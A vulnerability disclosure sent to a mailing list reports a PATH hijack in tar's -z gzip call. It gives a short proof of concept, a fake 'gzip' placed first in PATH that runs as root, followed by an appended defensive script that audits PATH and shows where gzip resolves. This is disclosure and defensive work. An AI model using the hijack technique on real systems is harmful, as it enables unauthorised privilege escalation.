Path Hijack vulnerability
From: Gregorio Giacobbe
Subject: Path Hijack vulnerability
Date: Wed, 3 Nov 2021 15:21:43 +0100
Hi!
As per subject, I discovered a Path Hijack vulnerability in the tar binary. When
using the -z switch for gzip compression/decompression, the binary calls “gzip”
without an absolute path, hence allowing the path hijack.
While this, in a normal scenario, can be totally harmless, it can be used as a
privilege escalation technique when the tar binary is called as root user.
The following lines provide a basic PoC:
----
export PATH=$(pwd):$PATH
echo -e '#!/bin/bash\ntouch /tmp/tarred' > gzip
chmod +x gzip
touch file.txt
tar -zcf backup.tar.gz file.txt
ls -la /tmp/tarred
-rw-r--r-- 1 root root 0 Nov 3 14:05 /tmp/tarred
----
I have not tested switches for other compression/decompression formats, so
there is a chance that they can be used as well as gzip.
The remediation would be to make sure that tar calls gzip by its absolute path.
Best Regards,
Gregorio Giacobbe
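
A defensive check for the condition described in the message above, as an added example that is not part of the original post: it audits the PATH a privileged job would pass to tar and shows which file a given program name resolves to. The function names `unsafe_path_entries` and `first_in_path` are hypothetical, and directory ownership is not checked.

```shell
#!/bin/sh
# Added example, not from the original message: audit the PATH that a
# privileged job hands to tar, because tar -z looks up "gzip" through it.
# Function names are hypothetical. Directory ownership is not checked.

# Print each risky entry of the PATH string $1 with a reason.
# Returns 1 if anything was flagged, 0 otherwise.
unsafe_path_entries() {
    rc=0
    # A leading, trailing or doubled colon means "current directory".
    case ":$1:" in
        *::*) echo "(empty entry): resolves to the current directory"; rc=1 ;;
    esac
    old_ifs=$IFS; IFS=:; set -f          # split on ':' without globbing
    for dir in $1; do
        case $dir in
            "") ;;                        # reported above
            /*) [ -d "$dir" ] || continue
                # -H follows a symlinked entry such as /bin -> usr/bin
                open=$(find -H "$dir" -prune \( -perm -002 -o -perm -020 \) 2>/dev/null) || true
                [ -z "$open" ] || { echo "$dir: writable by group or others"; rc=1; } ;;
            *)  echo "$dir: relative entry"; rc=1 ;;
        esac
    done
    set +f; IFS=$old_ifs
    return $rc
}

# Print the file that name $1 resolves to along the PATH string $2, i.e. the
# program a PATH lookup would execute. Returns 1 if no match exists.
first_in_path() {
    found=
    old_ifs=$IFS; IFS=:; set -f
    for dir in $2; do
        [ -n "$dir" ] || dir=.
        if [ -z "$found" ] && [ -f "$dir/$1" ] && [ -x "$dir/$1" ]; then
            found=$dir/$1
        fi
    done
    set +f; IFS=$old_ifs
    [ -n "$found" ] && echo "$found"
}

# Run as the user whose jobs call tar (for example root).
unsafe_path_entries "$PATH" || echo "PATH has entries to fix before running tar -z"
echo "gzip resolves to: $(first_in_path gzip "$PATH" || echo 'not found')"
```

A root job that sets its own fixed PATH, or passes an absolute compressor path through GNU tar's `--use-compress-program` option, does not depend on the caller's PATH for this lookup.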